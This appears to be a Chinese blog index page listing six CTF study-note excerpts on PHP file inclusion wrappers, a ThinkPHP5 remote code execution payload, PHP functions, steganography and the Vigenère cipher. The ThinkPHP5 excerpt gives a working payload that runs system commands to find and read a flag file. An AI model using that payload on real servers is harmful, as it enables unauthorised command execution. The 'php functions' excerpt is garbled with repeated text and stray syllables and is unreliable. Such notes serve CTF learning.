自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(6)
  • 收藏
  • 关注

原创 文件包含漏洞(一)

1.造成文件包含漏洞的函数通常有:include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readline2.data协议用法:data://text/plain,xxxx(要执行的php代码)data://text/plain;base64,xxxx(base64编码后的数据)3.php://协议php://input,用于执行php代码,需要post请

2021-01-15 20:12:05 208

原创 php一些函数

1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。MyClass是个类名,不用加符号。符号。符号。_va

2021-01-15 18:57:17 252

原创 thinkphp5的漏洞

payload:s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看fla

2021-01-15 16:41:42 405

原创 php运行方式

php运行方式运行php文件 php -f 路径+文件名 或者 php 路径+文件名(小技巧:windows下面可以把文件直接拖进去,省去cd/命令,或者慢慢拼写完整路径)两种方法都可以执行命令,如果是.php文件则执行php代码,否则直接以字符串形式读取文件或者直接用php.exe或者在cmd下php -a如果想要在本地测试可以先把文件放入www目录下,登录127.0.0.1/xx.php以下就是我所了解几种可以运行php的方法...

2021-01-07 15:08:01 389

原创 cloacked-pixel隐写

cloacked-pixel隐写,以月赛中的一道题为例,密码zaqqaz,得到一张图片,是cloacked-pixel隐写,使用方法如下。cloacked-pixel安装解压cloacked-pixel-master.zip到虚拟机cloacked-pixel使用加密:python lsb.py hide big.png 1.txt 123456ps: hide:表示加密模式; big.png:待加密的png图片; 1.txt:存放payload; 123456:加密的密码解密:pytho

2021-01-06 17:26:28 5615 1

原创 维吉尼亚密码

维吉尼亚密码是在凯撒密码基础上产生的一种加密方法,它将凯撒密码的全部25种位移排序为一张表,与原字母序列共同组成26行及26列的字母表。另外,维吉尼亚密码必须有一个密钥,这个密钥由字母组成,最少一个,最多可与明文字母数量相等。维吉尼亚密码加密方法示例如下:明文:I’ve got it.密钥:ok密文:W’fs qcd wd.首先,密钥长度需要与明文长度相同,如果少于明文长度,则重复拼接直到相同。本例中,明文长度为8个字母(非字母均被忽略),密钥会被程序补全为“okokokok”。现在根据如下维吉尼亚

2020-12-29 17:33:53 647

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除